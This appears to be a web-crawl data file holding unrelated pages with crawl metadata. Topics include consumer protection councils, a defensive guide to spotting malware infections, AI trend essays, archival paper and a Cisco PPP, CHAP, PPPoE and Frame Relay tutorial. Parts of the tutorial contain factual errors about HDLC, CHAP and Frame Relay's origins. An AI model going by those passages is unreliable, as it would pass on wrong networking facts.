The UK has a target of storing 10 megatons of captured CO2 per annum by end of 2030, he added. | <urn:uuid:9f9c7868-bb79-43c8-bc65-bec013c0be80> | CC-MAIN-2022-40 | https://digitalinfranetwork.com/news/circular-carbon-technologies-must-help-meet-2050-emissions-goal/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00602.warc.gz | en | 0.932941 | 1,368 | 2.75 | 3 |
CPC is established under Consumer Protection Council Act, Cap 25, 2004 Laws of the Federation of Nigeria, to promote and protect the interest of consumers over all products and services. In a nutshell, it is empowered to; Eliminate hazardous & substandard goods from the market.
How do consumer protection councils help consumer?
‘Consumer Protection Councils’ help the consumers in the following ways: These councils guide the consumers on the method of filing cases in the consumer court. They also represent consumers in the consumer courts. They also create awareness among the people regarding their rights as consumers.
What are consumer councils?
The Act provides for a central consumer protection council, a state consumer protection council and a district consumer protection council. The objective of these councils is to render advice on the promotion and protection of the consumers’ rights at their respective levels.
What is a consumer protection council in India?
The National Consumer Disputes Redressal Commission (NCDRC), India is a quasi-judicial commission in India which was set up in 1988 under the Consumer Protection Act of 1986. Its head office is in New Delhi.
What is the role of consumer Council?
The Council, as a watchdog protects the rights and interests of consumers by promoting a fair and just delivery of goods and services. First and foremost the Consumer Council is an advocacy organisation, conducting rigorous research and policy analysis on key consumer issues.
What is the role of Consumer Protection Council in India?
The Consumer Protection Bill, 1986 seeks to provide for better protection of the interests of consumers and for the purpose, to make provision for the establishment of Consumer councils and other authorities for the settlement of consumer disputes and for matter connected therewith. (f) right to consumer education.
Who is the head of consumer protection council?
Babatunde Irukera is the Executive Vice-Chairman/Chief Executive Officer of the Federal Competition and Consumer Protection Commission, FCCPC (formerly Consumer Protection Council).
Where is the Consumer Protection Council?
Company Description: CONSUMER PROTECTION COUNCIL (CPC) is located in Abuja, Nigeria and is part of the Executive, Legislative, and Other General Government Support Industry. There are 482 companies in the CONSUMER PROTECTION COUNCIL (CPC) corporate family.
What is Consumer Protection Council 10?
Answer : consumer protection council is a non-government organisation, spreading awareness among common people and help them to file cases in the court and get justice for the consumers. They represent individuals in the consumer courts.
What is the State Consumer Protection Council and its features?
quantity, potency, purity, price and standards of goods and services. The other objectives include protection of consumers against unfair trade practices, provide consumer education and assure access to a variety of goods and services wherever possible. The recommendations of the council are advisory in nature.
What is the objective of consumer protection council?
Provide speedy redress to consumer complaints and end the unscrupulous exploitation of consumers. Educate consumers and champion consumer interests at appropriate forum. Enforce all enactments aimed at protecting consumers.
What are the major functions of the Consumer Protection Act?
Consumer Protection Act provides Consumer Rights to prevent consumers from fraud or specified unfair practices. These rights ensure that consumers can make better choices in the marketplace and get help with complaints.
What are the major functions of the Consumer Protection?
1. The Right to Protect against the marketing of goods which are hazardous to life and property of the consumers. 2. The Right to Information: information about the quality, quantity, purity, standard etc., to protect the consumer against unfair trade practices. | <urn:uuid:12b5515a-1d4d-4592-a987-5a0ed7b78c40> | CC-MAIN-2022-40 | https://bestmalwareremovaltools.com/physical/you-asked-what-is-the-consumer-protection-council.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00602.warc.gz | en | 0.916427 | 746 | 2.578125 | 3 |
Unfortunately, it may happen occasionally that the antivirus installed in your computer with its latest updates is incapable of detecting a new virus, worm or a Trojan. Sadly but true: no antivirus protection software gives you a 100% guarantee of complete security. If your computer does get infected, you need to determine the fact of infection, identify the infected file and send it to the vendor whose product missed the malicious program and failed to protect your computer.
However, users on their own are typically unable to detect that their computer got infected unless aided by antivirus solutions. Many worms and Trojans typically do not reveal their presence in any way. By way of exception, some Trojans do inform the user directly that their computer has been infected – they may encrypt the user’s personal files so as to demand a ransom for the decryption utility. However, a Trojan typically installs itself secretly in the system, often employs special disguising methods and also covertly does its activity. So, the fact of infection can be detected by indirect evidence only.
Symptoms of infection
An increase in the outgoing web traffic is the general indication of an infection; this applies to both individual computers and corporate networks. If no users are working in the Internet in a specific time period (e.g. at night), but the web traffic continues, this could mean that somebody or someone else is active on the system, and most probably that is a malicious activity. In a firewall is configured in the system, attempts by unknown applications to establish Internet connections may be indicative of an infection. Numerous advertisement windows popping up while visiting web-sites may signal that an adware in present in the system. If a computer freezes or crashes frequently, this may be also related to a malware activity. Such malfunctions are more often accounted for by hardware or software malfunctions rather than a virus activity. However, if similar symptoms simultaneously occur on multiple or numerous computers on the network, accompanied by a dramatic increase in the internal traffic, this is very likely caused by a network worm or a backdoor Trojan spreading across the network.
An infection may be also indirectly evidenced by non-computer related symptoms, such as bills for telephone calls that nobody made or SMS messages that nobody sent. Such facts may indicate that a phone Trojan is active in the computer or the cell phone. If unauthorized access has been gained to your personal bank account or your credit card has bee used without your authorization, this may signal that a spyware has intruded into your system.
What to do
The first thing to do is make sure that the antivirus database is up-to-date and scan your computer. If this does not help, antivirus solutions from other vendors may do the job. Many manufacturers of anti-virus solutions offer free versions of their products for trial or one-time scanning – we recommend you to run one of these products on your machine. If it detects a virus or a Trojan, make sure you send a copy of the infected file to the manufacturer of the antivirus solution that failed to detect it. This will help this vendor faster develop protection against this threat and protect other users running this antivirus from getting infected.
If an alternative antivirus does not detect any malware, it is recommended that you disconnect your computer from the Internet or a local network, disable Wi-Fi connection and the modem, if any, before you start looking for the infected file(s). Do not use the network unless critically needed. Do not use web payment systems or internet banking services under any circumstances. Avoid referring to any personal or confidential data; do not use any web-based services that require your screen name and password.
How do I find an infected file?
Detecting a virus or Trojan in your computer in some cases may be a complex problem requiring a technical qualification; however, in other cases that may be a pretty straightforward task – this all depends on the degree of the malware complexity and the methods used to hide the malicious code embedded into the system. In the difficult cases when special methods (e.g. rootkit technologies) are employed to disguise and conceal the malicious code in the system, a non-professional may be unable to track down the infected file. This problem may require special utilities or actions, like connecting the hard disk to another computer or booting the system from a CD. However, if a regular worm or simple Trojan is around, you may be able to track it down using fairly simple methods.
The vast majority of worms and Trojan need to take control when the system starts. There are two basic ways for that:
- A link to the infected file is written to the autorun keys of the Windows registry;
- The infected file is copied to an autorun folder in Windows.
The most common autorun folders in Windows 2000 and XP are as follows:
%Documents and Settings%\All Users\Start Menu\Programs\Startup\
There are quite a number of autorun keys in the system register, the most popular keys include Run, RunService, RunOnce и RunServiceOnce, located in the following register folders:
Most probably, a search at the above locations will yield several keys with names that don’t reveal much information, and paths to the executable files. Special attention should be paid to the files located in the Windows system catalog or root directory. Remember names of these files, you will need them in the further analysis.
Writing to the following key is also common:
The default value of this key is “%1″ %*”.
Windows’ system (and system 32) catalog and root directory are the most convenient place to set worms and Trojans. This is due to 2 facts: the contents of these catalogs are not shown in the Explorer by default, and these catalogs host a great number of different system files, functions of which are completely unknown to a lay user. Even an experienced user will probably find it difficult to tell if a file called winkrnl386.exe is part of the operating system or foreign to it.
It is recommended to use any file manager that can sort file by creation/modification date, and sort the files located within the above catalogs. This will display all recently created and modified files at the top of the catalog – these very files will be of interest to the researcher. If any of these files are identical to those occurring in the autorun keys, this is the first wake-up call.
Advanced users can also check the open network ports using netstat, the standard utility. It is recommended to set up a firewall and scan the processes engaged in network activities. It is also recommended to check the list of active processes using dedicated utilities with advanced functionalities rather than the standard Windows utilities – many Trojans successfully avoid being detected by standard Windows utilities.
However, no universal advice can be given for all occasions. Advanced worms and Trojans occur every now then that are quite difficult to track down. In this case, it is best to consult the support service of the IT security vendor that released your antivirus client, a company offering IT assistance services, or ask for help at specialized web forums. Such web resources include www.virusinfo.info and anti-malware.ru (Russian language), and www.rootkit.com and www.gmer.net (English). Similar forums designed to assist users are also run by many antivirus companies. | <urn:uuid:6bde5f9e-9b6b-4be5-897a-eefcb012bf9f> | CC-MAIN-2022-40 | https://encyclopedia.kaspersky.com/knowledge/what-if-my-computer-is-infected/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00602.warc.gz | en | 0.934257 | 1,545 | 2.8125 | 3 |
Analyzing factors such as population density, demographics, climate and transportation statistics could help policy-makers find strategies that could control the virus without taking a huge toll on the economy, one researcher says.
While it’s clear there’s no one-size-fits-all solution to protecting Americans and opening the economy, one researcher thinks software can help local officials devise more-granular solutions.
Sai Dinakarrao, an assistant professor in George Mason University’s Department of Electrical and Computer Engineering, believes analyzing factors such as population density, demographics, climate and transportation statistics could help policy-makers find strategies that would prevent surges in the virus without taking a huge toll on the economy, GMU officials said.
Dinakarrao, along with colleagues from University of California at Davis and Morgan State University in Baltimore, was recently awarded funding from the National Science Foundation to develop a model for pandemic, focusing on community spread, mitigation measures and the optimal distribution of health care resources in that context.
The researchers plan to develop a tool that is “generic and demography-agnostic that determines the best solution for a given topology, such as a state, county, or city,” Dinakarrao said.
Drawing from current COVID-19 data, the solution will incorporate “machine learning and stochastic optimization techniques to determine the best epidemic confinement strategy, depending on demographic information as well as the epidemic spread,” according to the award announcement.
“Given the uncertainty in the available data regarding COVID-19 due to varied testing strategies and false positives, our methodologies consider these variations to determine the optimal confinement strategy under the constraints of economic impact,” Dinakarrao said.
Because the researchers just started the year-long project, the tool will used for later waves of COVID-19, future pandemics or to mitigate bioterrorism threats. The solution is expected to have applicability beyond the current pandemic.
“We want our tool to be as scalable and futuristic as possible,” Dinakarrao said. “We want it to be able to function for any kind of pandemic.”
NEXT STORY: Santa Cruz bans predictive policing | <urn:uuid:862213cf-f9f9-4895-9721-5406f25bd2a6> | CC-MAIN-2022-40 | https://gcn.com/data-analytics/2020/07/can-software-help-local-governments-find-alternatives-to-covid-lockdowns/315058/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00602.warc.gz | en | 0.910828 | 469 | 2.96875 | 3 |
In 2022, we will see artificial intelligence continue along the path to becoming the most transformative technology humanity has ever developed. According to Google CEO Sundar Pichai, its impact will be even greater than that of fire or electricity on our development as a species. This may seem like a very ambitious claim, but considering it is already being used to help us tackle climate change, explore space, and develop treatments for cancer, the potential is clearly there.
The full scale of the impact that giving machines the ability to make decisions – and therefore enable decision-making to take place far more quickly and accurately than could ever be done by humans – is very difficult to conceive right now. But one thing we can be certain of is that in 2022 breakthroughs and new developments will continue to push the boundaries of what’s possible. Here’s my pick of the key areas and fields where those breakthroughs will occur in 2022:
The augmented workforce
There have always been fears that machines or robots will replace human workers and maybe even make some roles redundant. However, as companies navigate the process of creating data and AI-literate cultures within their teams, we will increasingly find ourselves working with or alongside machines that use smart and cognitive functionality to boost our own abilities and skills. In some functions, such as marketing, we’re already used to using tools that help us determine which leads are worth pursuing and what value we can expect from potential customers. In engineering roles, AI tools help us by providing predictive maintenance – letting us know ahead of time when machines will need servicing or repairing. In knowledge industries, such as law, we will increasingly use tools that help us sort through the ever-growing amount of data that's available to find the nuggets of information that we need for a particular task. In just about every occupation, smart tools and services are emerging that can help us do our jobs more efficiently, and in 2022 more of us will find that they are a part of our everyday working lives.
Bigger and better language modeling
Language modeling is a process that allows machines to understand and communicate with us in language we understand – or even take natural human languages and turn them into computer code that can run programs and applications. We have recently seen the release of GPT-3 by OpenAI, the most advanced (and largest) language model ever created, consisting of around 175 billion “parameters”- variables and datapoints that machines can use to process language. OpenAI is known to be working on a successor, GPT-4, that will be even more powerful. Although details haven’t been confirmed, some estimate that it may contain up to 100 trillion parameters, making it 500 times larger than GPT-3, and in theory taking a big step closer to being able to create language and hold conversations that are indistinguishable from those of a human. It will also become much better at creating computer code.
AI in cybersecurity
This year the World Economic Forum identified cybercrime as potentially posing a more significant risk to society than terrorism. As machines take over more of our lives, hacking and cybercrime inevitably become more of a problem, as every connected device you add to a network is inevitably a potential point-of-failure that an attacker could use against you. As networks of connected devices become more complex, identifying those points of failure becomes more complex. This is where AI can play a role, though. By analyzing network traffic and learning to recognize patterns that suggest nefarious intentions, smart algorithms are increasingly playing a role in keeping us safe from 21st-century crime. Some of the most significant applications of AI that we will see develop in 2022 are likely to be in this area.
AI and the Metaverse
The metaverse is the name given for a unified persistent digital environment, where users can work and play together. It’s a virtual world, like the internet, but with the emphasis on enabling immersive experiences, often created by the users themselves. The concept has become a hot topic since Mark Zuckerberg spoke about creating it by combing virtual reality technology with the social foundations of his Facebook platform.
AI will undoubtedly be a lynchpin of the metaverse. It will help to create online environments where humans will feel at home at having their creative impulses nurtured. We will also most likely become used to sharing our metaverse environments with AI beings that will help us with tasks we’re there to do, or just be our partner for a game of tennis or chess when we want to relax and unwind.
Low-code and no-code AI
A big barrier to the adoption of AI-driven efficiency in many companies is the scarcity of skilled AI engineers who can create the necessary tools and algorithms. No-code and low-code solutions aim to overcome this by offering simple interfaces that can be used, in theory, to construct increasingly complex AI systems. Much like the way web design and no-code UI tools now let users create web pages and other interactive systems simply by dragging and dropping graphical elements together, no-code AI systems will let us create smart programs by plugging together different, pre-made modules and feeding them with our own domain-specific data. Technologies such as natural language processing and language modeling (see above) mean that soon it may be possible to use nothing more than our voice or written instructions. All of this will play a key role in the ongoing "democratization” of AI and data technology.
AI is the "brains" that will guide the autonomous cars, boats, and aircraft that are set to revolutionize travel and society over the coming decade. 2022 should be a year to remember when we look back in the future and contemplate with horror the fact that we thought it was normal that 1.3 million people died of traffic accidents every year, 90% of which were caused by human error!
As well as increasingly effective autonomous cars – Tesla says its cars will demonstrate full self-driving capability by 2022, although it’s unlikely they will be ready for general use. Its competitors include Waymo (created by Google), Apple, GM, and Ford, and any of them can be expected to announce major leaps forward in the next year. The year will hopefully also see the first autonomous ship crossing the Atlantic, as the Mayflower Autonomous Ship (MAS), powered by IBM and designed in partnership with non-profit ProMare, will once again attempt the journey (having been forced to turn back during its initial attempt this year).
We know that AI can be used to create art, music, poetry, plays, and even video games. In 2022, as new models such as GPT-4 and Google’s Brain redefine the boundaries of what’s possible, we can expect more elaborate and seemingly “natural” creative output from our increasingly imaginative and capable electronic friends. Rather than these creations generally being demonstrations or experiments to show off the potential of AI, as is the case now, in 2022, we will increasingly see them applied to routine creative tasks, such as writing headlines for articles and newsletters, designing logos and infographics. Creativity is often seen as a very human skill, and the fact we are now seeing these capabilities emerging in machines means “artificial” intelligence is undeniably coming closer in terms of scope and function to the somewhat nebulous concept we have of what constitutes “real” intelligence. | <urn:uuid:7e5ce941-09fb-47bd-bc07-195dc85844fe> | CC-MAIN-2022-40 | https://bernardmarr.com/the-7-biggest-artificial-intelligence-ai-trends-in-2022/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00602.warc.gz | en | 0.955481 | 1,518 | 2.6875 | 3 |
From Frankenstein to I, Robot, we have for centuries been intrigued with and terrified of creating beings that might develop autonomy and free will. And now that we stand on the cusp of the age of ever-more-powerful artificial intelligence, the urgency of developing ways to ensure our creations always do what we want them to do is growing.
For some in AI, like Mark Zuckerberg , AI is just getting better all the time and if problems come up, technology will solve them. But for others, like Elon Musk , the time to start figuring out how to regulate powerful machine-learning-based systems is now. On this point, I’m with Musk. Not because I think the doomsday scenario that Hollywood loves to scare us with is around the corner but because Zuckerberg’s confidence that we can solve any future problems is contingent on Musk’s insistence that we need to “learn as much as possible” now.
How do humans work?
And among the things we urgently need to learn more about is not just how artificial intelligence works, but how humans work. Humans are the most elaborately cooperative species on the planet. We outflank every other animal in cognition and communication – tools that have enabled a division of labor and shared living in which we have to depend on others to do their part. That’s what our market economies and systems of government are all about. But sophisticated cognition and language—which AIs are already starting to use—are not the only features that make humans so wildly successful at cooperation.
Unwritten rules of group normativity
Humans are also the only species to have developed “group normativity” – an elaborate system of rules and norms that designate what is collectively acceptable and not acceptable for other people to do, kept in check by group efforts to punish those who break the rules. Many of these rules can be enforced by officials with prisons and courts but the simplest and most common punishments are enacted in groups: criticism and exclusion—refusing to play, in the park, market, or workplace, with those who violate norms. When it comes to the risks of AIs exercising free will, then, what we are really worried about is whether or not they will continue to play by and help enforce our rules. So far the AI community and the donors funding AI safety research – investors like Musk and several foundations – have mostly turned to ethicists and philosophers to help think through the challenge of building AI that plays nice. Thinkers like Nick Bostrom have raised important questions about the values AI, and AI researchers, should care about. […] | <urn:uuid:93433ff7-bcb1-4579-acbd-bef98749a4d7> | CC-MAIN-2022-40 | https://swisscognitive.ch/2017/09/17/control-ai-we-need-understand-humans/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00602.warc.gz | en | 0.958871 | 530 | 2.71875 | 3 |
If you’re interested in astronomy or have a kid that’s learning about the solar system in school, this 3D, interactive, Flash-driven model of the solar system can be really cool. You can check out the constellations with the Panoramatic view, zoom in on planets with the Heliocentric view, and focus on Earth with a Geocentric view.
You can perform a search for the heavenly bodies or zoom in and drag the objects around with your mouse. You can also change the date to see where objects were or will be. The settings are pretty customizable.
Go check out www.SolarSystemScope.com to begin your space exploration. | <urn:uuid:4e768f9d-ea1d-4288-9040-758d05904c25> | CC-MAIN-2022-40 | https://www.404techsupport.com/2011/04/02/solar-system-scope-an-interactive-3d-model-of-the-solar-system-and-night-sky/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00602.warc.gz | en | 0.918637 | 142 | 2.9375 | 3 |
Acid-Free and Archival Paper
In art, archival papers are essential if we want paper-bound works of art to stand the test of time. In business, archival papers might not seem as important (considering the increasing reliance on digital documents), but they still serve a purpose, especially for legal, historical, or other significant documents.
All types of paper can deteriorate over time. There are two ways to slow or eliminate deterioration. First, the production process must remove those things in the paper stock which cause it to change. Secondly, you must observe purposeful and careful storage and handling methods.
Why does paper deteriorate?
While the process is chemically complex, the simple answer is that paper is wood pulp. Wood pulp naturally contains lignin – an acidic substance that makes up the cellular walls in wood pulp. It’s this element that is the main culprit in paper deterioration. That deterioration accelerates through the lignin’s exposure to sunlight, water, or the passage of time.
You’ve probably seen a yellowed, brittle newspaper left outside. Even if it was just new last month, the combination of excessive lignin found in newsprint and the exposure to the elements means the deterioration process was extreme. It has been yellowed, stained, and might even begin to crumble.
Wood pulp can be chemically treated during the paper-making process to remove some, or all, of the lignin, thereby lowering the amount of acid in the paper stock.
It’s worth noting that even high-quality papers with low levels of lignin can suffer when they are not stored correctly for long periods. Semi-archival documents stored in folders made of cheap paper, or even in untreated wooden drawers or cabinets, will deteriorate faster than they usually would just by being in contact with those other, high-lignin content surfaces.
Acid-Free and Archival Papers
The paper’s natural acidity is measured by the alkaline, or pH, levels. The newsprint mentioned above, for example, has a very high pH level. In the 1930s, scientists discovered the connection between the alkaline levels in paper and their archival properties. By the 1950s, printers took steps to remove the acid from paper stock used for archival purposes.
While there are various standards for “acid-free” paper, high-quality papers have either had all the lignin removed through chemical processes or have exceptionally low pH levels that are considered acid-free.
The term “archival” is universal and can be used somewhat freely by paper manufacturers. However, in most cases, “archival” papers are deemed stable because they are usually acid-free, contain no unbleached pulp, and are free from the optical brighteners sometimes used to whiten the paper stock. While those kinds of papers last a long time without any deterioration, a cotton rag is used instead of wood pulp to manufacture truly archival paper. Therefore, it naturally has very little, if any, acidity.
The types of paper available to you for business purposes are wide-ranging. If you are concerned about the durability and stability of the paper, read the packaging. Begin by seeking out acid-free paper stock. Many high-quality papers might also use a combination of cotton rag and wood pulp. The balance between the two will give you a good idea of how you can expect it to age. | <urn:uuid:0b63084b-4a14-461c-8a91-ea358c3969f3> | CC-MAIN-2022-40 | https://www.capitalmds.com/acid-free-and-archival-paper/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00602.warc.gz | en | 0.94506 | 718 | 3.28125 | 3 |
You can go through the basic configuration and verification of the Point-to-Point Protocol (PPP) here, and learn how to configure and verify PPP along with PAP and CHAP authentication, as well as PPPoE. These technologies operate at layer 2. Additionally, frame relay is a very cost-efficient data transmission telecommunication service for intermittent traffic. In the sections below, the operation of frame relay and its point-to-point and multipoint circuits are explained in detail.
PPP stands for the Point-to-Point Protocol, which operates at layer 2 of the OSI model. HDLC is Cisco proprietary and is the default encapsulation on serial links when all the devices are Cisco; otherwise, the links need to be configured for PPP. Two types of authentication can be used with PPP: CHAP and PAP.
The diagram above uses three routers, a loopback connection, two switches, and two PCs. Whether you use Packet Tracer or real devices, the first task is to cable the network. Next, perform the basic router configuration: set the hostname, disable DNS lookup, and configure a console password, a message-of-the-day banner, a privileged EXEC password, the VTY lines, and synchronous logging. Then configure the interfaces on R1, R2, and R3 with IP addresses from the addressing table. Verify that the IP addressing is correct and that the interfaces are active by issuing the show ip interface brief command. After that, configure and test the Ethernet interfaces on PC1 and PC3 by pinging their default gateways. Once all devices are connected, finish by configuring OSPF.
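As an illustration of those initial steps, the commands below sketch what the basic configuration on R1 might look like. The passwords, banner text, interface numbers, addresses, and OSPF process number are placeholder values, since the lab's addressing table is not reproduced here.

    Router(config)# hostname R1
    R1(config)# no ip domain-lookup
    R1(config)# enable secret class
    R1(config)# banner motd # Authorized access only #
    R1(config)# line console 0
    R1(config-line)# password cisco
    R1(config-line)# login
    R1(config-line)# logging synchronous
    R1(config-line)# line vty 0 4
    R1(config-line)# password cisco
    R1(config-line)# login
    R1(config-line)# exit
    R1(config)# interface serial 0/0/0
    R1(config-if)# ip address 10.1.1.1 255.255.255.252
    R1(config-if)# no shutdown
    R1(config-if)# exit
    R1(config)# router ospf 1
    R1(config-router)# network 10.1.1.0 0.0.0.3 area 0

After the interfaces are addressed, show ip interface brief and pings to the default gateways confirm that the links are up.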
Configuring PPP itself is straightforward:
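For example, switching the serial link between R1 and R2 from the default HDLC to PPP only requires changing the encapsulation on both ends of the link (the interface numbers are assumptions):

    R1(config)# interface serial 0/0/0
    R1(config-if)# encapsulation ppp

    R2(config)# interface serial 0/0/0
    R2(config-if)# encapsulation ppp

Both sides of the link must use the same encapsulation; if one end is left at the default HDLC, the line protocol will stay down.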
PAP stands for Password Authentication Protocol. Passwords are sent in plain text, with no protection or encryption, and there are no periodic checks. PAP is used by the Point-to-Point Protocol to validate users before permitting them access to server resources, and most remote servers' network operating systems support it. It is a very basic two-way process.
When the ppp authentication pap command is used, the username and password are sent as one LCP data package, rather than the server sending a login prompt and waiting for a response.
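A minimal two-way PAP sketch between R1 and R2 might look like the following; the usernames mirror the router hostnames, and cisco123 is a placeholder password that must match on both sides:

    R1(config)# username R2 password cisco123
    R1(config)# interface serial 0/0/0
    R1(config-if)# encapsulation ppp
    R1(config-if)# ppp authentication pap
    R1(config-if)# ppp pap sent-username R1 password cisco123

    R2(config)# username R1 password cisco123
    R2(config)# interface serial 0/0/0
    R2(config-if)# encapsulation ppp
    R2(config-if)# ppp authentication pap
    R2(config-if)# ppp pap sent-username R2 password cisco123

Each router's username entry must correspond to the credentials the peer sends with ppp pap sent-username, otherwise the authentication fails and the link stays down.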
CHAP stands for Challenge Handshake Authentication Protocol. The passwords are encrypted, and periodic checks are sent to make sure the router is still speaking to the same peer, which makes CHAP more secure than PAP. It follows a three-way exchange of a shared secret. PAP essentially stops checking once authentication is accomplished, which leaves the network vulnerable, whereas CHAP conducts periodic challenges, at link establishment and afterwards, to ensure that the remote host still holds a valid password.
In this process, the central-site router initiates the three-way handshake by sending a challenge message to the remote router. The remote router responds by sending its username and a hash of the password. The central-site router then checks the username and password against its local database for a match; if they match, it accepts the connection, and if they do not, it rejects it.
The CHAP configuration procedure is mostly straightforward. Imagine two routers, Left and Right, connected across a network as shown in the figure below.
As the first step, issue the encapsulation ppp command on the interface. Then enable CHAP authentication on both routers with the ppp authentication chap command. Finally, configure the username and password using the username <name> password <password> command, where the username is the peer router's hostname. Make sure the passwords are identical at both ends and that the usernames exactly match the peer hostnames, because they are case sensitive.
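A minimal sketch for the Left router follows (the shared secret secret123 and the interface numbering are examples only; Right receives the mirror-image configuration with the command username Left password secret123):

Left(config)# username Right password secret123
Left(config)# interface serial 0/0/0
Left(config-if)# encapsulation ppp
Left(config-if)# ppp authentication chap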
A call comes in from the 766-1 router to the 3640-1 router; this is the first step in the CHAP exchange.
A CHAP challenge packet is built.
The challenge packet is received from the peer and processed with MD5.
A CHAP response packet to be sent back to the authenticator is built.
The figure below shows how to verify the CHAP configuration, which is the most important step. The ID identifies the original challenge packet and is fed into the MD5 hash generator, along with the original random challenge number. The 766-1 looks up the password in its local database, a TACACS+ server, or a RADIUS server, and that password is also fed into the MD5 hash generator. The hash value received in the response packet is then compared with the locally calculated MD5 hash value; authentication succeeds if the two hash values are equal.
PPP over Ethernet is commonly called PPPoE. It provides an emulated point-to-point link over a shared medium, typically the broadband aggregation network found at DSL service providers. In the usual scenario, a PPPoE client runs on the user side and connects to, and acquires its configuration from, a PPPoE server on the ISP side. ATM typically runs between the user's modem and the DSLAM, although this is transparent when the PPPoE client resides on a separate device.
The client-side configuration is relatively simple: create a dialer interface to manage the PPPoE connection and tie it to the physical interface that provides the transport.
The PPPoE dialer interface:
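A minimal client-side sketch is shown below; the dialer number, dialer pool number, and physical interface are assumptions and should be adapted to the actual hardware:

interface dialer 1
 mtu 1492
 ip address negotiated
 encapsulation ppp
 dialer pool 1
!
interface fastethernet 0/1
 no ip address
 pppoe enable
 pppoe-client dial-pool-number 1
 no shutdown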
Here, the line "ip address negotiated" is what instructs the client to use the IP address offered by the PPPoE server.
Frame Relay is a standardized WAN technology that specifies the physical and logical link layers of digital telecommunication channels using a packet-switching methodology. It is designed for cost-efficient transmission of intermittent traffic between LANs and between endpoints in a WAN. Frame Relay places data into variable-size units called frames and relays them to the endpoint, which speeds up overall data transmission. The service is provided by a number of carriers, such as AT&T, on fractional or full T-carrier circuits. Frame Relay offers a mid-range service between ISDN, which provides bandwidth at 128 Kbps, and ATM, which operates in a similar fashion to Frame Relay but at speeds of 155.520 Mbps or 622.080 Mbps.
Frame Relay is based on the older X.25 packet-switching technology, which was designed for transmitting analog data such as voice conversations. It is most often used to connect LANs to major backbones, as well as on public WANs and in private network environments with leased lines over T-1 circuits. It provides a dedicated, reliable connection for the duration of the transmission, and under some circumstances it is also used for voice and video traffic.
Frame Relay relays packets at the data link layer of the OSI (Open Systems Interconnection) model rather than at the network layer. A frame can incorporate packets from various protocols, including X.25 and Ethernet, and frames vary in size, reaching a thousand bytes or more.
A Frame Relay (FR) network consists of customer nodes and FR switches. The Frame Relay switches act as the DCE and the customer equipment acts as the DTE. A virtual circuit is established between a DTE and its corresponding DCE, and each virtual circuit is identified by a Data Link Connection Identifier (DLCI) number. The DLCI has local significance, meaning that on a given physical channel no two virtual circuits may share the same DLCI.
Frame Relay is a packet-switched network and is often compared with X.25. Although both X.25 and Frame Relay use the same basic HDLC framing, there are many differences between the two. Frame Relay's typical speeds are higher than those of X.25, its protocol overhead and complexity are comparatively lower, and it is well suited to LAN connectivity for fast file transfers and interactive sessions. Frame Relay is still widely implemented, but it does not provide node-to-node error correction.
Point-to-point Frame Relay is the easiest to configure. On Frame Relay networks, a single VC originates at the local end and terminates at the remote end, and a subnet address is normally assigned to each point-to-point connection. Hence only one DLCI has to be configured on each point-to-point subinterface. For example, assume the locally significant DLCI at the hub router R3 is 304 and at the spoke router R4 is 403, and that the subnet 192.168.1.0/30 is allocated to this point-to-point network. Thirty-bit subnet masks are normally used for point-to-point connections to conserve address space.
The destination is identified and configured with the frame-relay interface-dlci command in subinterface configuration mode. Once configured, the command associates the chosen point-to-point subinterface with the DLCI, and it also lets the user choose the Frame Relay encapsulation type to be used on that particular VC. If the command is executed without specifying an encapsulation type, the default is used.
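As an illustration, the spoke router R4 could be configured as follows to match the example addressing above (the serial interface number and the exact host address are assumptions); the verification output shown below corresponds to such a subinterface:

interface Serial1/2
 no ip address
 encapsulation frame-relay
!
interface Serial1/2.403 point-to-point
 ip address 192.168.1.2 255.255.255.252
 frame-relay interface-dlci 403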
Serial1/2.403 (up): point-to-point dlci, dlci 403(0xC9,0x3090), broadcast
status defined, active
(The output above shows the point-to-point Frame Relay mapping for the subinterface.)
When creating Frame Relay subinterfaces, it is good practice to make the subinterface number mirror the DLCI value of the PVC assigned to it. In the point-to-point case there is no need to use the frame-relay map command to perform static address mapping, because the endpoint of a point-to-point connection is automatically assumed to reside on the same subnet as the starting point.
By default, physical interfaces on Cisco routers are multipoint interfaces. When multipoint subinterfaces are created on a physical interface, it is essential to assign specific DLCIs to each multipoint subinterface. By default, Cisco IOS software assigns all unassigned DLCIs advertised by the Frame Relay switch to the router's physical interface.
When multipoint subinterfaces are created on a physical interface, the DLCI of a virtual circuit remains assigned to the physical interface until it is specifically allocated to a subinterface with the frame-relay map protocol or frame-relay interface-dlci command.
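A hedged sketch of a multipoint subinterface with static mappings is shown below; the IP addresses and DLCI values are examples only:

interface Serial1/2.304 multipoint
 ip address 192.168.2.1 255.255.255.0
 frame-relay map ip 192.168.2.2 304 broadcast
 frame-relay map ip 192.168.2.3 305 broadcast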
The sections above covered the configuration and verification of PPP with PAP and CHAP authentication, and PPPoE on the client side only. These protocols and authentication techniques are widely used on Cisco routers. Frame Relay was also explained with examples and configuration, making it easy to understand its operation and its point-to-point and multipoint types and to build a solid grasp of the technology.
Product Adopted: Digital Transmission
An automobile manufacturing plant is one of the largest industrial facilities in the world, with thousands of automobiles being produced every day. An automotive assembly plant utilizes state-of-the-art robotic technology. Robotic machines are used in industrial automation to complete mundane repetitive tasks that are not desirable to workers.
Traditionally, serial protocols were the preferred communication method in industrial automation applications; Ethernet was not accepted by large vendors with proprietary protocols, which prevented its wide acceptance on the factory floor until the early 90s. New-generation equipment utilizes IP protocols devised for the control industry, so as manufacturing facilities install new equipment using these protocols, they also need new Ethernet-based networking infrastructure.
